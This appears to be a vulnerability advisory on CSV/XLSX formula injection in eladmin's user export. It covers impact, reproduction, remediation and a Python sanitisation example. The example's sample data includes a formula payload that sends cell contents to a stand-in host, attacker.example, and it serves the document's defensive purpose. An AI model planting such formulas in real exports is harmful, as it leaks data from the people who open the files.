elunez eladmin CSV/XLSX Injection Vulnerability

Vulnerability

A CSV/XLSX injection (formula injection) vulnerability affects elunez eladmin versions through 2.7. The exportUser function writes user-supplied field values into CSV or XLSX exports without neutralising the characters that spreadsheet applications interpret as the start of a formula. An attacker who controls an exported field (for example a username) can therefore plant a formula that is evaluated when someone opens the exported file, potentially disclosing sensitive information.

Impact

Exploitation lets the injected formulas execute in the spreadsheet application of whoever opens the export (typically an administrator), on that user's machine rather than on the server. Such formulas can exfiltrate data, for example the local system username or the contents of other cells, to an attacker-controlled host. Depending on the spreadsheet application and its configuration (for example Excel with DDE enabled), this can also lead to local code execution.

Reproduction

To reproduce, create a user whose username begins with a spreadsheet formula (a value starting with '=', for instance) through the '/api/users' endpoint, then request the export from the '/api/users/download' endpoint. Opening the downloaded file in a spreadsheet application shows the formula being evaluated instead of displayed as text, which confirms the injection.

Remediation

All exported fields should be treated as untrusted text. Before a value is written to CSV or XLSX, any string whose first character is one of '=', '+', '-', '@', tab (0x09) or carriage return (0x0D) should be neutralised, most commonly by prefixing it with a single quote so the client renders it as text. CSV output should additionally quote every field and double embedded quotes so a payload containing commas or quotes cannot spill into neighbouring cells. For XLSX, user-supplied values must be written as string cells and never passed to a formula-setting API.
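The following is an added example, not code from eladmin or from the advisory author. It shows the sanitisation described above applied to a CSV export, and reuses the reproduction scenario: a constructed user list containing an attacker-registered username that is a spreadsheet formula. The record layout, field names and sample values are assumptions for illustration only; the export is rendered with sanitisation switched off (mirroring the vulnerable behaviour) and on.

```python
"""Formula-injection neutralisation for CSV exports (added example)."""
import csv
import io

# Characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula when they appear first in a cell. Tab and carriage
# return are included because some clients drop them and then evaluate
# what follows (OWASP CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample records; the field names are assumptions and are not
# eladmin's actual User entity.
SAMPLE_USERS = [
    {"username": "alice", "nickname": "Alice",
     "email": "alice@example.com", "enabled": True},
    # Attacker-registered account: the username is a spreadsheet formula and
    # the nickname uses the '@' Lotus-style trigger.
    {"username": '=HYPERLINK("https://attacker.example/?u="&A1,"click")',
     "nickname": "@SUM(1+1)", "email": "mallory@example.com", "enabled": True},
    # Benign but trigger-leading value: it gets a harmless leading quote too.
    {"username": "-bob", "nickname": "Bob",
     "email": "bob@example.com", "enabled": False},
]

COLUMNS = ("username", "nickname", "email", "enabled")


def sanitize_cell(value):
    """Return a text-safe version of one exported cell.

    Non-strings pass through unchanged (numbers stay numbers). A string whose
    first non-space character is a formula trigger is prefixed with a single
    quote, which spreadsheet clients read as "display as text". Ignoring
    leading spaces is a conservative choice: it costs at most a stray quote
    on a benign value, never a missed payload.
    """
    if not isinstance(value, str):
        return value
    stripped = value.lstrip(" ")
    if stripped and stripped[0] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_users_csv(users, sanitize=True):
    """Render user records as CSV text.

    With sanitize=False the output mirrors the vulnerable export path
    (values copied verbatim); with sanitize=True every cell is neutralised.
    QUOTE_ALL plus the csv module's doubling of embedded quotes keeps a
    payload containing commas or quotes from spilling into other cells.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(COLUMNS)
    for user in users:
        row = [user[col] for col in COLUMNS]
        if sanitize:
            row = [sanitize_cell(v) for v in row]
        writer.writerow(row)
    return buf.getvalue()


def parse_csv(text):
    """Parse CSV text back into a list of rows (used to inspect the export)."""
    return list(csv.reader(io.StringIO(text)))


if __name__ == "__main__":
    print("--- vulnerable export ---")
    print(export_users_csv(SAMPLE_USERS, sanitize=False))
    print("--- sanitised export ---")
    print(export_users_csv(SAMPLE_USERS))
```

The leading quote may remain visible in some clients when the CSV is opened; that is the accepted trade-off of this defence. The same sanitize_cell check applies to XLSX output, with the additional rule that values go through the library's string-cell setter (in Apache POI, setCellValue with a String) rather than a formula setter, so the client never sees a formula cell at all.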

Added: Aug 20, 2025, 8:23 PM
Updated: Aug 20, 2025, 8:23 PM

Vulnerability Rating

Custom Algorithm
spread: 0.3
impact: 1.7
exploitability: 6.0
remediation: 0.0
relevance: 0.4
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.